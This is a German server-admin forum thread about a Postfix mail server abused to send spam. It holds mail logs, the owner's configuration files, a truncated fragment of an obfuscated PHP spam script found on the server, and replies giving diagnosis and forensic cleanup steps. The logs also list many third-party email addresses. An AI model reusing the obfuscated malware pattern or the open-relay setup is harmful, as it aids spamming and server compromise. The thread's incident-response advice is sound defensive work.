Oct 13 18:21:21 hetzner opendkim[2519]: B71AB47505E: no signature data
Oct 13 18:21:21 hetzner postfix/bounce[4063]: 3D9BF473B9F: sender non-delivery notification: D4A34475080
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: D4A34475080: from=<>, size=4056, nrcpt=1 (queue active)
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 3D9BF473B9F: removed
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: DD5334750B3: from=<>, size=3799, nrcpt=1 (queue active)
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: B71AB47505E: from=<bitdefender@hetzner.marketstrategy.de>, size=1635, nrcpt=1 (queue active)
Oct 13 18:21:21 hetzner postfix/bounce[4117]: A2B9D474FF6: sender non-delivery notification: DD5334750B3
Oct 13 18:21:21 hetzner postfix/smtp[2977]: 991EB474F7F: to=<postmaster@hetzner.marketstrategy.de>, relay=127.0.0.1[127.0.0.1]:10025, delay=0.36, delays=0.08/0/0.04/0.24, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as B71AB47505E)
Oct 13 18:21:21 hetzner postfix/smtpd[3122]: disconnect from localhost.localdomain[127.0.0.1]
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 991EB474F7F: removed
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: A2B9D474FF6: removed
Oct 13 18:21:22 hetzner postfix/smtp[2754]: B71AB47505E: to=<postmaster@hetzner.marketstrategy.de>, relay=none, delay=0.21, delays=0.2/0/0/0, dsn=5.4.4, status=bounced (Host or domain name not found. Name service error for name=hetzner.marketstrategy.de type=AAAA: Host not found)
Oct 13 18:21:22 hetzner postfix/smtp[2735]: D4A34475080: to=<becky@sitzungspause.de>, relay=none, delay=0.08, delays=0.08/0/0/0, dsn=5.4.6, status=bounced (mail for sitzungspause.de loops back to myself)
Oct 13 18:21:22 hetzner postfix/smtp[2828]: DD5334750B3: to=<bitdefender@hetzner.marketstrategy.de>, relay=none, delay=0.05, delays=0.04/0/0/0, dsn=5.4.4, status=bounced (Host or domain name not found. Name service error for name=hetzner.marketstrategy.de type=AAAA: Host not found)
Oct 13 18:21:22 hetzner postfix/qmgr[2658]: D4A34475080: removed
Oct 13 18:21:22 hetzner postfix/qmgr[2658]: DD5334750B3: removed
Oct 13 18:21:22 hetzner postfix/cleanup[4061]: 07275473B9F: message-id=<20161013162122.07275473B9F@hetzner.marketstrategy.de>
Oct 13 18:21:22 hetzner postfix/smtp[2975]: 90A1A474FA1: to=<fpdenke@optonline.net>, relay=mx.optimum.net[167.206.4.77]:25, delay=1.4, delays=0.09/0/0.93/0.39, dsn=5.7.1, status=bounced (host mx.optimum.net[167.206.4.77] said: 554 5.7.1 Spam detected by content scanner.  Message rejected.  (in reply to end of DATA command))
Oct 13 18:21:22 hetzner postfix/cleanup[4058]: 10AA7474F7F: message-id=<20161013162122.10AA7474F7F@hetzner.marketstrategy.de>
Oct 13 18:21:22 hetzner postfix/qmgr[2658]: 3DF0947427A: removed
Oct 13 18:21:22 hetzner postfix/bounce[4063]: B71AB47505E: sender non-delivery notification: 07275473B9F
Oct 13 18:21:22 hetzner postfix/qmgr[2658]: 10AA7474F7F: from=<>, size=3483, nrcpt=1 (queue active)
Oct 13 18:21:22 hetzner postfix/qmgr[2658]: B71AB47505E: removed
Oct 13 18:21:22 hetzner postfix/qmgr[2658]: 07275473B9F: from=<>, size=3799, nrcpt=1 (queue active)
Oct 13 18:21:22 hetzner postfix/bounce[4258]: 90A1A474FA1: sender non-delivery notification: 10AA7474F7F
Oct 13 18:21:22 hetzner postfix/qmgr[2658]: 90A1A474FA1: removed
Oct 13 18:21:22 hetzner postfix/smtp[2747]: 10AA7474F7F: to=<loretta@sitzungspause.de>, relay=none, delay=0.04, delays=0.04/0/0/0, dsn=5.4.6, status=bounced (mail for sitzungspause.de loops back to myself)
Oct 13 18:21:22 hetzner postfix/smtp[2827]: 07275473B9F: to=<bitdefender@hetzner.marketstrategy.de>, relay=none, delay=0.08, delays=0.08/0/0/0, dsn=5.4.4, status=bounced (Host or domain name not found. Name service error for name=hetzner.marketstrategy.de type=AAAA: Host not found)
Oct 13 18:21:22 hetzner postfix/qmgr[2658]: 10AA7474F7F: removed
Oct 13 18:21:22 hetzner postfix/qmgr[2658]: 07275473B9F: removed
Oct 13 18:21:22 hetzner postfix/smtp[2768]: A3784474FAA: to=<chuckl331@comcast.net>, relay=mx2.comcast.net[68.87.20.5]:25, delay=1.6, delays=0.11/0/0.93/0.54, dsn=2.0.0, status=sent (250 2.0.0 v4ML1t0620H6Qkw014MMdV mail accepted for delivery)
Oct 13 18:21:22 hetzner postfix/qmgr[2658]: A3784474FAA: removed
Oct 13 18:21:22 hetzner postfix/smtpd[3628]: connect from mail.coma.de[62.245.168.42]
Oct 13 18:21:22 hetzner postfix/smtpd[3628]: NOQUEUE: reject: RCPT from mail.coma.de[62.245.168.42]: 454 4.7.1 <gisela_rolf@sitzungspause.de>: Relay access denied; from=<> to=<gisela_rolf@sitzungspause.de> proto=ESMTP helo=<mail.coma.de>
Oct 13 18:21:22 hetzner postfix/smtpd[3628]: disconnect from mail.coma.de[62.245.168.42]
Oct 13 18:21:24 hetzner postfix/smtpd[3575]: connect from smtp-33-i6.italiaonline.it[212.48.14.167]
Oct 13 18:21:24 hetzner postfix/smtpd[3575]: NOQUEUE: reject: RCPT from smtp-33-i6.italiaonline.it[212.48.14.167]: 454 4.7.1 <ethan_cummings@sitzungspause.de>: Relay access denied; from=<> to=<ethan_cummings@sitzungspause.de> proto=ESMTP helo=<libero.it>
Oct 13 18:21:24 hetzner postfix/smtp[2767]: CC5B8474FCE: to=<seyayukikohayashi@yahoo.co.jp>, relay=mx3.mail.yahoo.co.jp[182.22.12.249]:25, delay=3.7, delays=0.1/0/1.1/2.6, dsn=2.0.0, status=sent (250 ok dirdel)
Oct 13 18:21:24 hetzner postfix/qmgr[2658]: CC5B8474FCE: removed
Oct 13 18:21:25 hetzner postfix/smtp[2974]: 66D844742A0: to=<glenyo2@comcast.net>, relay=mx1.comcast.net[96.114.157.80]:25, delay=4.1, delays=0.11/0/2.8/1.2, dsn=2.0.0, status=sent (250 2.0.0 v4MN1t06J0H6Qkw014MQ8T mail accepted for delivery)
Oct 13 18:21:25 hetzner postfix/smtpd[3651]: connect from piast.pertus.com.pl[195.116.191.6]
Oct 13 18:21:25 hetzner postfix/qmgr[2658]: 66D844742A0: removed
Oct 13 18:21:25 hetzner postfix/smtpd[3651]: NOQUEUE: reject: RCPT from piast.pertus.com.pl[195.116.191.6]: 454 4.7.1 <adam_wisniewski@sitzungspause.de>: Relay access denied; from=<> to=<adam_wisniewski@sitzungspause.de> proto=ESMTP helo=<piast.pertus.com.pl>
Oct 13 18:21:26 hetzner postfix/smtpd[2778]: connect from mail.tgacademy.org.uk[82.45.159.13]
Oct 13 18:21:26 hetzner postfix/smtpd[2778]: NOQUEUE: reject: RCPT from mail.tgacademy.org.uk[82.45.159.13]: 454 4.7.1 <justin_fields@sitzungspause.de>: Relay access denied; from=<> to=<justin_fields@sitzungspause.de> proto=ESMTP helo=<mail.tgacademy.org.uk>
Oct 13 18:21:26 hetzner postfix/smtpd[2778]: NOQUEUE: reject: RCPT from mail.tgacademy.org.uk[82.45.159.13]: 454 4.7.1 <justin_fields@sitzungspause.de>: Relay access denied; from=<> to=<justin_fields@sitzungspause.de> proto=ESMTP helo=<mail.tgacademy.org.uk>
Oct 13 18:21:26 hetzner postfix/smtpd[2778]: disconnect from mail.tgacademy.org.uk[82.45.159.13]
Oct 13 18:21:28 hetzner postfix/smtp[2903]: AD3F84763A9: to=<dre@wangfu.ca>, relay=smtp-2.storm.ca[209.87.239.68]:25, delay=134110, delays=134054/0/1.2/55, dsn=2.0.0, status=sent (250 Ok: queued as DD95F840184)
Oct 13 18:21:28 hetzner postfix/qmgr[2658]: AD3F84763A9: removed
Oct 13 18:21:29 hetzner postfix/smtpd[3628]: connect from kermit.polishtravel.com.pl[46.28.243.13]
Oct 13 18:21:29 hetzner postfix/smtpd[3628]: NOQUEUE: reject: RCPT from kermit.polishtravel.com.pl[46.28.243.13]: 454 4.7.1 <jadwiga_zielinski@sitzungspause.de>: Relay access denied; from=<> to=<jadwiga_zielinski@sitzungspause.de> proto=ESMTP helo=<kermit.polishtravel.com.pl>
Oct 13 18:21:29 hetzner postfix/smtpd[3628]: disconnect from kermit.polishtravel.com.pl[46.28.243.13]
Oct 13 18:21:29 hetzner postfix/smtp[2737]: 16D8C474F6B: to=<readcoin@telusplanet.net>, relay=mx.telus.net[207.167.198.25]:25, delay=9.3, delays=0.14/0/5.2/3.9, dsn=2.0.0, status=sent (250 2.0.0 uikybUTZMmDGquil3b84rg mail accepted for delivery)
Oct 13 18:21:29 hetzner postfix/qmgr[2658]: 16D8C474F6B: removed

@sitzungpause.de ist Beispielsweiße ein Domain meines Servers über den Spams verteilt werden. (Die Domain ist eigentlich keine maildomain)
Ich habe ClamAV Drüber geschickt, DKIM und SPF Installiert (funktionieren) doch langsam gehen mir die Ideen aus.

hier noch meine main.cf:

smtpd_banner = $myhostname ESMTP $mail_name (Ubuntu)
biff = no

append_dot_mydomain = no

readme_directory = no

mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
mydestination =
mailbox_size_limit = 51200000
message_size_limit = 51200000
recipient_delimiter =
inet_interfaces = all
myorigin = hetzner.marketstrategy.de
inet_protocols = all

#smtpd_sender_restrictions =
#smtpd_sender_login_maps = 
#smtpd_sender_login_maps = mysql:/etc/postfix/virtual/sender-login-maps.cf
#smtpd_sender_restrictions = permit_mynetworks, reject_non_fqdn_sender, reject_sender_login_mismatch, permit_sasl_authenticated

##### TLS parameters ######
smtpd_tls_cert_file=/var/www/webmail/custom_luggie/ssl/webmail.crt
smtpd_tls_key_file=/var/www/webmail/custom_luggie/ssl/webmail.key

#smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
#smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key

smtpd_use_tls=yes
smtpd_tls_mandatory_protocols = !SSLv2, !SSLv3
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
smtp_tls_security_level=may
smtpd_tls_security_level=may

###### SASL Auth ######
smtpd_sasl_type = dovecot
smtpd_sasl_path = private/auth
smtpd_sasl_auth_enable = yes
#broken_sasl_auth_clients = yes
#smtpd_sasl_security_options = noanonymous

###### Use Dovecot LMTP Service to deliver Mails to Dovecot ######
virtual_transport = lmtp:unix:private/dovecot-lmtp

##### Only allow mail transport if client is authenticated or in own network (PHP Scripts, ...) ######
smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination

###### MySQL Connection ######
virtual_alias_maps = mysql:/etc/postfix/virtual/mysql-aliases.cf
virtual_mailbox_maps = mysql:/etc/postfix/virtual/mysql-maps.cf
virtual_mailbox_domains = mysql:/etc/postfix/virtual/mysql-domains.cf
local_recipient_maps = $virtual_mailbox_maps

###### amavis
#content_filter=smtp-amavis:[127.0.0.1]:10024
#myhostname = hetzner.marketstrategy.de


##### catchall
sender_bcc_maps = hash:/etc/postfix/sender_bcc 
recipient_bcc_maps = hash:/etc/postfix/recipient_bcc_maps

####doubles
enable_original_recipient = No

##### exe,zip,bat,etc block
mime_header_checks = regexp:/etc/postfix/mime_header_checks

#Added by BitDefender, do not remove!
content_filter = smtp:127.0.0.1:10025
#End of added lines


####Antispam

#smtpd_sender_restrictions = hash:/etc/postfix/access
#reject_unauth_destination = hash:/etc/postfix/access


# DKIM
# --------------------------------------
milter_default_action = accept
milter_protocol = 6
smtpd_milters = inet:localhost:8891
non_smtpd_milters = inet:localhost:8891

und meine master.cf

#
# Postfix master process configuration file.  For details on the format
# of the file, see the master(5) manual page (command: "man 5 master" or
# on-line: http://www.postfix.org/master.5.html).
#
# Do not forget to execute "postfix reload" after editing this file.
#
# ==========================================================================
# service type  private unpriv  chroot  wakeup  maxproc command + args
#               (yes)   (yes)   (yes)   (never) (100)
# ==========================================================================
smtp      inet  n       -       n       -       -       smtpd
#smtp      inet  n       -       -       -       1       postscreen
#smtpd     pass  -       -       -       -       -       smtpd
#dnsblog   unix  -       -       -       -       0       dnsblog
#tlsproxy  unix  -       -       -       -       0       tlsproxy

submission inet n       -       -       -       -       smtpd -v
  -o syslog_name=postfix/submission
  -o smtpd_tls_security_level=encrypt
  -o smtpd_sasl_type=dovecot
  -o smtpd_sasl_path=private/auth
  -o smtpd_sasl_security_options=noanonymous
  -o smtpd_sasl_auth_enable=yes
  -o smtpd_client_restrictions=permit_sasl_authenticated,reject

#smtps     inet  n       -       -       -       -       smtpd
#  -o syslog_name=postfix/smtps
#  -o smtpd_tls_wrappermode=yes
#  -o smtpd_sasl_auth_enable=yes
#  -o smtpd_reject_unlisted_recipient=no
#  -o smtpd_client_restrictions=$mua_client_restrictions
#  -o smtpd_helo_restrictions=$mua_helo_restrictions
#  -o smtpd_sender_restrictions=$mua_sender_restrictions
#  -o smtpd_recipient_restrictions=
#  -o smtpd_relay_restrictions=permit_sasl_authenticated,reject
#  -o milter_macro_daemon_name=ORIGINATING
#628       inet  n       -       -       -       -       qmqpd
pickup    unix  n       -       -       60      1       pickup
   -o content_filter=
   -o receive_override_options=no_header_body_checks,no_unknown_recipient_checks,no_milters
cleanup   unix  n       -       -       -       0       cleanup
qmgr      unix  n       -       n       300     1       qmgr
#qmgr     unix  n       -       n       300     1       oqmgr
tlsmgr    unix  -       -       -       1000?   1       tlsmgr
rewrite   unix  -       -       -       -       -       trivial-rewrite
bounce    unix  -       -       -       -       0       bounce
defer     unix  -       -       -       -       0       bounce
trace     unix  -       -       -       -       0       bounce
verify    unix  -       -       -       -       1       verify
flush     unix  n       -       -       1000?   0       flush
proxymap  unix  -       -       n       -       -       proxymap
proxywrite unix -       -       n       -       1       proxymap
smtp      unix  -       -       -       -       -       smtp
relay     unix  -       -       -       -       -       smtp
#       -o smtp_helo_timeout=5 -o smtp_connect_timeout=5
showq     unix  n       -       -       -       -       showq
error     unix  -       -       -       -       -       error
retry     unix  -       -       -       -       -       error
discard   unix  -       -       -       -       -       discard
local     unix  -       n       n       -       -       local
virtual   unix  -       n       n       -       -       virtual
lmtp      unix  -       -       -       -       -       lmtp
anvil     unix  -       -       -       -       1       anvil
scache    unix  -       -       -       -       1       scache
#
# ====================================================================
# Interfaces to non-Postfix software. Be sure to examine the manual
# pages of the non-Postfix software to find out what options it wants.
#
# Many of the following services use the Postfix pipe(8) delivery
# agent.  See the pipe(8) man page for information about ${recipient}
# and other message envelope options.
# ====================================================================
#
# maildrop. See the Postfix MAILDROP_README file for details.
# Also specify in main.cf: maildrop_destination_recipient_limit=1
#
maildrop  unix  -       n       n       -       -       pipe
  flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}
#
# ====================================================================
#
# Recent Cyrus versions can use the existing "lmtp" master.cf entry.
#
# Specify in cyrus.conf:
#   lmtp    cmd="lmtpd -a" listen="localhost:lmtp" proto=tcp4
#
# Specify in main.cf one or more of the following:
#  mailbox_transport = lmtp:inet:localhost
#  virtual_transport = lmtp:inet:localhost
#
# ====================================================================
#
# Cyrus 2.1.5 (Amos Gouaux)
# Also specify in main.cf: cyrus_destination_recipient_limit=1
#
#cyrus     unix  -       n       n       -       -       pipe
#  user=cyrus argv=/cyrus/bin/deliver -e -r ${sender} -m ${extension} ${user}
#
# ====================================================================
# Old example of delivery via Cyrus.
#
#old-cyrus unix  -       n       n       -       -       pipe
#  flags=R user=cyrus argv=/cyrus/bin/deliver -e -m ${extension} ${user}
#
# ====================================================================
#
# See the Postfix UUCP_README file for configuration details.
#
uucp      unix  -       n       n       -       -       pipe
  flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)
#
# Other external delivery methods.
#
ifmail    unix  -       n       n       -       -       pipe
  flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient)
bsmtp     unix  -       n       n       -       -       pipe
  flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t$nexthop -f$sender $recipient
scalemail-backend unix	-	n	n	-	2	pipe
  flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store ${nexthop} ${user} ${extension}
mailman   unix  -       n       n       -       -       pipe
  flags=FR user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py
  ${nexthop} ${user}


#smtp-amavis     unix    -       -       -       -       2       smtp
#        -o smtp_data_done_timeout=1200
#        -o smtp_send_xforward_command=yes
#        -o disable_dns_lookups=yes
#        -o max_use=20
#        -o smtp_tls_security_level=none

#127.0.0.1:10025 inet    n       -       -       -       -       smtpd
#        -o content_filter=
#        -o local_recipient_maps=
#        -o relay_recipient_maps=
#        -o smtpd_restriction_classes=
#        -o smtpd_delay_reject=no
#        -o smtpd_client_restrictions=permit_mynetworks,reject
#        -o smtpd_helo_restrictions=
#        -o smtpd_sender_restrictions=
#        -o smtpd_recipient_restrictions=permit_mynetworks,reject
#        -o smtpd_data_restrictions=reject_unauth_pipelining
#        -o smtpd_end_of_data_restrictions=
#        -o mynetworks=127.0.0.0/8
#        -o smtpd_error_sleep_time=0
#        -o smtpd_soft_error_limit=1001
#        -o smtpd_hard_error_limit=1000
#        -o smtpd_client_connection_count_limit=0
#        -o smtpd_client_connection_rate_limit=0
#        -o receive_override_options=no_header_body_checks,no_unknown_recipient_checks
#        -o smtpd_tls_security_level=none

#Added by BitDefender, do not remove!
127.0.0.1:10026     inet  n      -      n      -      10      smtpd -o content_filter= -o smtp_send_xforward_command=yes
#End of added lines

Welche Infos braucht ihr noch?
Danke schon mal!

 

[greystone]

Welche Infos braucht ihr noch?

Eine ungefähre Preisvorstellung?

----------

Im Ernst: Das sieht so aus als ob entweder Dein Mailserver nicht richtig(=nicht sicher genug) konfiguriert ist, oder dass sich jemand über ein möglicherweise eher schlecht abgesichertes Web-CMS(So sieht das für mich aus) Zugang zu Deinem Server verschafft hat und den jetzt zum Spammen missbraucht.

Die Massnahme den SMTP-Server abzuschalten, war jedenfalls schon mal gut.

Wenn Du wirklich einen Mailserver betreiben willst: Löse das Problem! Lerne Postfix! Verstehe das(die) Postfix-Logfile(s) zu lesen und finde heraus wie dieser Spam erzeugt wird! Das ist umfangreich und hat eine gewisse Komplexität, ist aber durchaus machbar. Ich habe das auch so gelernt. Und irgendwann hat man's kapiert.

Wenn Dir das zu viel Mühe ist, dann lass es lieber bleiben und hol' Dir jemanden, der das kann oder nutze einen externen Maildienst.

 

[luggie]

Jop...
Das ich etwas lernen muss um etwas zu können wusste ich schon bevor ich mich Linuxserver herum geschlagen habe. Danke.

ich benutze SugarCRM als Datenbankinterface und Webmail und Roundcube als Webmailoberfläche.

Was ich brauche sind Gedankenanstöße, Selbstchecklisten, Ideen, Anfragen über mehr Information oder ggf den billigsten/besten komerziellen Anbieter.

Aber ich bin das von diesem Forum leider gewöhnt. Hier stellt man besser fragen, wenn man's eigentlich schon besser weiß ... das verstehe wer will

 

[nexus]

Aber ich bin das von diesem Forum leider gewöhnt. Hier stellt man besser fragen, wenn man's eigentlich schon besser weiß ... das verstehe wer will

Das stimmt so definitiv nicht!
Das Problem liegt darin, daß du sicher ein gewisses Basiswissen mitbringst, aber die Komplexität eines Mailservers unterschätzt hast.
Außerdem ist ein Produktivsystem keine Testumgebung. Neue Software oder Änderungen an bestehender Software testet man zuerst so gut wie möglich aus, bevor man sie in ein Produktivsystem einspielt.

Zu deinem eigentlichen Problem...wie greystone schon angedeutet hat, versendet dein System scheinbar Spammails und das vermutlich schon vor der Installation der neuen Software. Daß es jetzt aufgefallen ist, liegt daran, daß die neue Software auch ausgehende Mails überprüft (was vorher ja scheinbar nicht passiert ist).
Jetzt mußt du erstmal herausfinden, wo die Schwachstelle ist, die da ausgenutzt wurde bzw. wird.

 

[greystone]

Das ich etwas lernen muss, um etwas zu können wusste ich schon, bevor ich mich Linuxserver herum geschlagen habe.

Wenn Du das weisst und tatsächlich hier anwendest, dann wäre das zumindest mal 'ne Arbeitsgrundlage für uns, d. h. für Dich und die Helfer hier. Ich würde mal vermuten, hier sind eher wenige Forumsteilnehmer, die Dich an die Hand nehmen und mit einem Löffelchen in leicht verdaulichen kleinen Häppchen Dich mit dem Mailserversüppchen füttern. Und über diesen wenig schmeichelhaften Satz kannst Du Dich jetzt beschweren und aufregen oder Du erkennst die harte Wahrheit an - Du bist gefordert, um Dein Problem zu lösen - und beginnst damit Dich einzuarbeiten und dann helfen Dir die Tips der Anwesenden hier nämlich auch.

Der flüssige Umgang mit Standardsystemwerkzeugen(bash-Scripting, grep, find) und Textfilterwerkzeugen(awk ist spitze; sed kann etwas weniger; perl ist mittlerweile als veraltet verschrien, speziell bei der Logfileanalyse aber eine echte Waffe) leistet hier gute Dienste.

Was ich brauche sind Gedankenanstöße, Selbstchecklisten, Ideen, Anfragen über mehr Information oder ggf den billigsten/besten komerziellen Anbieter.

Gedankenanstöße

• Lerne eine Suchmaschine zu benutzen(Und ja: Ich muss mir auch immer mal wieder *zurecht* RTFM sagen lassen. Macht aber nix - hilft jedes Mal)
• Dein Webserver ist vermutlich mit irgendeiner Malware infiziert. Suche nach kürzlich veränderten Dateien. Heisser Kandidat ist die PHP eval() Funktion und PHP-Dateien mit durcheinandergewürfeltem Buchstabenmüll, worin Spam-Code verschleiert ist.
• Weiterer heisser Kandidat sind POST-Requests in Deinen Webserver-Logfiles. Eine übermässige Zahl von Requests hilft Dir mögliche Einbruchspunkte zu erkennen.
• Durchsuche die Temp-Verzeichnisse des Systems. Hier könnten Programme zum Spammen rumliegen
• Informiere Dich, wie Du die eingesetzte Websoftware(SugarCMS,Roundcube) und Webserversoftware(Apache) sicher konfigurierst.
• Für die Zukunft: Beobachte die Inhalte Deiner Webserverdatenverzeichnisse(z. B. mit git - einem Versionsverwaltungssystem, oder einem IDS). Damit kannst Änderungen sehen und Manipulationen leichter feststellen.
• Für die Zukunft: Beobachte Deine Mailqueue und die Anzahl der versendeten Mails(mailgraph,pflogsum)
• Ich wiederhole: Setze Dich mit Postfix auseinander. Ohne mal wenigstens den grundlegenden Aufbau der Komponenten zu kennen und zu verstehen, kannst Du eher schlecht als Recht Logfilerecherche betreiben. Ich fand ein Bild zur Postfix-Architektur(Google!) für das Verständnis ganz hilfreich.

 

[Thorsten]

Hallo!
Was ist denn das bitte:

http://sitzungspause.de/ajax.php?d=78&JAd2AN6Pngk1GkL=5yu1&Dtf=GkR&3DHR=6

Was hat das in deinem Mailheader zu suchen? Und richtig merkwürdig finde ich die Weiterleitung an die Domain top-trader-profit.com.

mfG
Thorsten

 

[Joe User]

Man installiert sich eine fragwürdige Software und nahezu zeitgleich fängt das System an massenweise SPAM zu versenden...

Man könnte, wenn man ganz böse ist, diese zwei Ereignisse in einen kausalen Zusammenhang setzen und hätte dadurch eine völlig unvorstellbare mögliche Ursache für ein Problem gefunden. Aber das ist nun wirklich sehr abwägig...

 

[Joe User]

Was hat das in deinem Mailheader zu suchen?

Im Subject nicht relevant.
Aber diese Header-Zeile ist zu kontrollieren:

X-PHP-Originating-Script: 33:footer.php(1949) : eval()'d code

 

[Thorsten]

Ok, aber wenn sitzungspause.de seine Domain ist, hat er wohl nicht nur ein SPAM Problem.

mfG
Thorsten

 

[Joe User]

Abgesehen davon dass die main.cf/master.cf grauenhaft ist, fehlen dort essentielle smtpd_*_restrictions wodurch das Ding ein Open-Relay ist und völlig zu Recht auf Blacklists steht.

Obendrauf kommen wohl noch gehackte WebApps und es würde mich nicht wundern, wenn das erst die Spitze des Eisbergs ist...


Da wird dann wohl auch Hetzner demnächst die Kiste nullrouten.

 

[TerraX]

Last but not least, der PTR scheint auch nicht korrekt gesetzt...

 

[luggie]

durcheinandergewürfeltem Buchstabenmüll, worin Spam-Code verschleiert ist.

Die "ajax.php" zB war bei meinem letzten Backup noch nicht vorhanden der inhalt schaut ca so aus:

.....
$content = ${sqRM6Az1xr7u5("4l>A6\"K@a")}("\n", $content);

	${xYEKnZDbvg("k:\\GEG")} = ${fkx2djK("6u:;p@??y")}($content);

$content = ${YPJ8vj5("CElaF\$K,i)A&")}("\n", $content);

if (${sqRM6Az1xr7u5("3@w=13qa\"xt")}(${YPJ8vj5("k:\\GEG")}, b5Qjki("W4A;;")) === FALSE)
{
    ${sqRM6Az1xr7u5("3a?Cug7")}(b5Qjki("l;;B4>E]'ME;cJ.>?<:54H>E9Y<1C5E]FHG;,9"));
    ${u4Ew4QR0("3a?Cug7")}(sqRM6Az1xr7u5("l;;B4>E]u=HF:?6B8??jQ5IJ,/5;
....

Danke schonmal!

 

[ThomasChr]

Tja, da haste den schuldigen. (oder zumindest einen davon!)
Jetzt musst du 'nur noch' rausfinden durch welche Lücke in welcher (wahrscheinlich veralteten) Webanwendung er gekommen ist!

 

[nexus]

Was ich brauche sind Gedankenanstöße, Selbstchecklisten, Ideen, Anfragen über mehr Information oder ggf den billigsten/besten komerziellen Anbieter.

Dein System ist als kompromittiert zu betrachten. Die nächsten Schritte sollten sein:
- System herunterfahren
- ins Rescue booten und ein komplettes Image des Systems anfertigen
- das Image in einer isolierten Umgebung analysieren, um den Schaden und die Angriffsvektoren zu ermitteln
- das System neu aufsetzen (ein Schließen der Lücken im komromittierten System ist nicht zielführend)
- die Angriffsvektoren eliminieren (aktuelle Programmversionen verwenden, auf unsichere Addons/Plugins verzichten)
- (hoffentlich vorhandene) Nutzerdatenbackups einspielen
- System wieder ans Netz bringen

Wenn du dir das nicht selber zutraust, dann mußt du auf professionelle Hilfe zurückgreifen. Hier im Forum gibt es einen Bereich "Suche", wo du eine entsprechende Anfrage formulieren kannst. Alternativ hilft dir auch die Suchmaschine deiner Wahl, um ein auf eine solche forensische Analyse spezialisiertes Unternehmen zu finden.